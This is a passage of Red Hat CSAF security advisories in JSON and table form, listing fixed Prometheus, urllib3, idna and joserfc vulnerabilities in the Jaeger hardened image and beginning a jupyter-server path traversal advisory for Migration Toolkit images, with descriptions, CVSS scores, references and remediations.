],
"category": "product_family",
"name": "Red Hat Hardened Images"
},
{
"branches": [
{
"category": "product_version",
"name": "jaeger-main@aarch64",
"product": {
"name": "jaeger-main@aarch64",
"product_id": "jaeger-main@aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/jaeger@2.19.0-1.hum1?arch=aarch64\u0026distro=hummingbird-20251124\u0026repository_id=public-hummingbird-aarch64-rpms"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "jaeger-main@src",
"product": {
"name": "jaeger-main@src",
"product_id": "jaeger-main@src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/jaeger@2.19.0-1.hum1?arch=src\u0026distro=hummingbird-20251124\u0026repository_id=public-hummingbird-source-rpms"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "jaeger-main@x86_64",
"product": {
"name": "jaeger-main@x86_64",
"product_id": "jaeger-main@x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/jaeger@2.19.0-1.hum1?arch=x86_64\u0026distro=hummingbird-20251124\u0026repository_id=public-hummingbird-x86_64-rpms"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "jaeger-main@aarch64 as a component of Red Hat Hardened Images",
"product_id": "Red Hat Hardened Images:jaeger-main@aarch64"
},
"product_reference": "jaeger-main@aarch64",
"relates_to_product_reference": "Red Hat Hardened Images"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jaeger-main@src as a component of Red Hat Hardened Images",
"product_id": "Red Hat Hardened Images:jaeger-main@src"
},
"product_reference": "jaeger-main@src",
"relates_to_product_reference": "Red Hat Hardened Images"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "jaeger-main@x86_64 as a component of Red Hat Hardened Images",
"product_id": "Red Hat Hardened Images:jaeger-main@x86_64"
},
"product_reference": "jaeger-main@x86_64",
"relates_to_product_reference": "Red Hat Hardened Images"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-42151",
"cwe": {
"id": "CWE-256",
"name": "Plaintext Storage of a Password"
},
"discovery_date": "2026-05-04T19:02:26.983660+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466507"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Prometheus, an open-source monitoring system. The `client_secret` field within the Azure Active Directory (AD) remote write OAuth configuration was incorrectly handled as a plain string instead of a secure Secret type. This misconfiguration allowed any user or process with access to the `/-/config` HTTP API endpoint to view the Azure OAuth client secret in plaintext. This vulnerability leads to information disclosure, potentially compromising the security of integrated Azure AD services.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/prometheus/prometheus: Prometheus: Information disclosure of Azure OAuth client secret via config API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important information disclosure flaw in Prometheus affects instances configured to use Azure AD remote write with OAuth authentication. The client secret, intended to be a secure credential, is exposed in plaintext through the `/-/config` HTTP API endpoint. This could allow an attacker with access to this endpoint to retrieve the secret, potentially compromising integrated Azure AD services.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42151"
},
{
"category": "external",
"summary": "RHBZ#2466507",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466507"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42151",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42151"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42151",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42151"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18587",
"url": "https://github.com/prometheus/prometheus/pull/18587"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18590",
"url": "https://github.com/prometheus/prometheus/pull/18590"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj",
"url": "https://github.com/prometheus/prometheus/security/advisories/GHSA-wg65-39gg-5wfj"
}
],
"release_date": "2026-05-04T18:12:16.917000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/prometheus/prometheus: Prometheus: Information disclosure of Azure OAuth client secret via config API"
},
{
"cve": "CVE-2026-42154",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-04T19:02:19.626646+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2466505"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Prometheus. An unauthenticated attacker can exploit the remote read endpoint (`/api/v1/read`) by sending a specially crafted, small snappy-compressed payload. This payload causes a disproportionately large memory allocation, leading to memory exhaustion and a Denial of Service (DoS) by crashing the Prometheus process.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "github.com/prometheus/prometheus: Prometheus: Denial of Service via uncontrolled memory allocation in remote read endpoint",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This is an Important denial of service vulnerability in Prometheus, allowing an unauthenticated remote attacker to crash the Prometheus process. This could lead to service unavailability in Red Hat products that deploy Prometheus for monitoring, as the remote read endpoint does not properly validate snappy-compressed request lengths.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-42154"
},
{
"category": "external",
"summary": "RHBZ#2466505",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2466505"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-42154",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-42154"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-42154",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42154"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18584",
"url": "https://github.com/prometheus/prometheus/pull/18584"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/pull/18585",
"url": "https://github.com/prometheus/prometheus/pull/18585"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.11.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3",
"url": "https://github.com/prometheus/prometheus/releases/tag/v3.5.3"
},
{
"category": "external",
"summary": "https://github.com/prometheus/prometheus/security/advisories/GHSA-8rm2-7qqf-34qm",
"url": "https://github.com/prometheus/prometheus/security/advisories/GHSA-8rm2-7qqf-34qm"
}
],
"release_date": "2026-05-04T18:13:12.340000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "github.com/prometheus/prometheus: Prometheus: Denial of Service via uncontrolled memory allocation in remote read endpoint"
},
{
"cve": "CVE-2026-44431",
"cwe": {
"id": "CWE-201",
"name": "Insertion of Sensitive Information Into Sent Data"
},
"discovery_date": "2026-05-13T17:01:41.663622+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477167"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. When using the low-level API via `ProxyManager.connection_from_url().urlopen()` with `assert_same_host=False`, cross-origin redirects can still forward sensitive headers. This could allow a remote attacker to gain unauthorized access to sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44431"
},
{
"category": "external",
"summary": "RHBZ#2477167",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477167"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44431",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44431"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44431"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-qccp-gfcp-xxvc"
}
],
"release_date": "2026-05-13T15:20:24.588000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.9,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "urllib3: urllib3: Information disclosure via cross-origin redirects forwarding sensitive headers"
},
{
"cve": "CVE-2026-44432",
"cwe": {
"id": "CWE-409",
"name": "Improper Handling of Highly Compressed Data (Data Amplification)"
},
"discovery_date": "2026-05-13T17:01:01.083841+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in urllib3, an HTTP client library for Python. This vulnerability allows a remote attacker to cause excessive resource consumption, such as high CPU usage and massive memory allocation, on the client side. This occurs when urllib3 attempts to decompress an entire HTTP response, even if only a partial read was requested, or when draining the connection after a partial decompression. This can lead to a Denial of Service (DoS) condition.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44432"
},
{
"category": "external",
"summary": "RHBZ#2477154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44432",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44432"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44432"
},
{
"category": "external",
"summary": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j",
"url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-mf9v-mfxr-j63j"
}
],
"release_date": "2026-05-13T15:17:12.611000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "urllib3: urllib3: Denial of Service due to excessive HTTP response decompression"
},
{
"cve": "CVE-2026-45409",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-05T23:01:44.292958+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2485616"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the idna library, which handles Internationalized Domain Names in Python applications. A remote attacker could exploit this vulnerability by sending specially crafted, excessively long inputs to the library\u0027s encoding function. This could cause the system to consume significant resources, leading to a Denial of Service (DoS), where the affected application becomes unavailable to legitimate users. This issue stems from an incomplete fix for a previously identified vulnerability.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "python-idna: idna: Denial of Service via specially crafted long inputs",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "A flaw was found in the python-idna library. This is an incomplete fix for CVE-2024-3651. The idna.encode() function performs contextual validation checks (valid_contexto) before rejecting oversized inputs, allowing specially crafted long payloads to cause excessive CPU consumption and lead to a denial of service. The fix in version 3.14 rejects long inputs early before further processing, and version 3.15 extends this approach to alternate per-label conversion and codec functions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45409"
},
{
"category": "external",
"summary": "RHBZ#2485616",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2485616"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45409",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45409"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45409"
},
{
"category": "external",
"summary": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx",
"url": "https://github.com/kjd/idna/security/advisories/GHSA-65pc-fj4g-8rjx"
}
],
"release_date": "2026-06-05T22:06:07.082000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
},
{
"category": "workaround",
"details": "To mitigate this denial-of-service vulnerability, applications utilizing the `idna` Python library should implement input validation to ensure that domain names do not exceed the standard 253-character length limit before being passed to the `idna.encode()` function. This operational control prevents the processing of excessively long inputs that could lead to resource exhaustion and service unavailability.\n\nApplications that pass user-controlled data directly to `idna.encode()` without validation checks (e.g.: DNS length \u003c 254 chars) are affected.",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "python-idna: idna: Denial of Service via specially crafted long inputs"
},
{
"cve": "CVE-2026-48990",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-17T22:00:51.839483+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2490168"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in joserfc, a Python library for JSON Object Signing and Encryption (JOSE). This vulnerability allows a remote attacker to cause resource exhaustion, leading to a Denial of Service (DoS), by sending oversized JSON Web Signature (JWS) payloads. The library fails to apply size limits, specifically JWSRegistry.max_payload_length, when processing RFC7797 b64=false JWS payloads.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48990"
},
{
"category": "external",
"summary": "RHBZ#2490168",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490168"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48990"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/releases/tag/1.6.7",
"url": "https://github.com/authlib/joserfc/releases/tag/1.6.7"
},
{
"category": "external",
"summary": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5",
"url": "https://github.com/authlib/joserfc/security/advisories/GHSA-wphv-vfrh-23q5"
}
],
"release_date": "2026-06-17T21:08:10.534000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-06-10T09:34:54+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\nhttps://images.redhat.com/",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:25039"
},
{
"category": "workaround",
"details": "The risk can be mitigated by rejecting oversized serialized JWS inputs before they reach joserfc and enforcing strict request/body size limits at the application or reverse-proxy layer.",
"product_ids": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"Red Hat Hardened Images:jaeger-main@aarch64",
"Red Hat Hardened Images:jaeger-main@src",
"Red Hat Hardened Images:jaeger-main@x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "joserfc: joserfc: Resource exhaustion via oversized JSON Web Signature (JWS) payloads"
}
]
}
RHSA-2026:43038
Vulnerability from csaf_redhat - Published: 2026-07-21 22:10 - Updated: 2026-08-05 02:30A flaw was found in jupyter-server. This path traversal vulnerability exists due to insufficient validation of file paths, specifically an incorrect root directory boundary check and improper handling of directory traversal sequences. This allows a remote attacker with low privileges to bypass directory restrictions and gain unauthorized read and write access to files in sibling directories. This could lead to the exposure of sensitive data, particularly in shared hosting environments.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64 | — |
Vendor Fix
fix
|
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64 | — | ||
| Unresolved product id: Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64 | — | ||
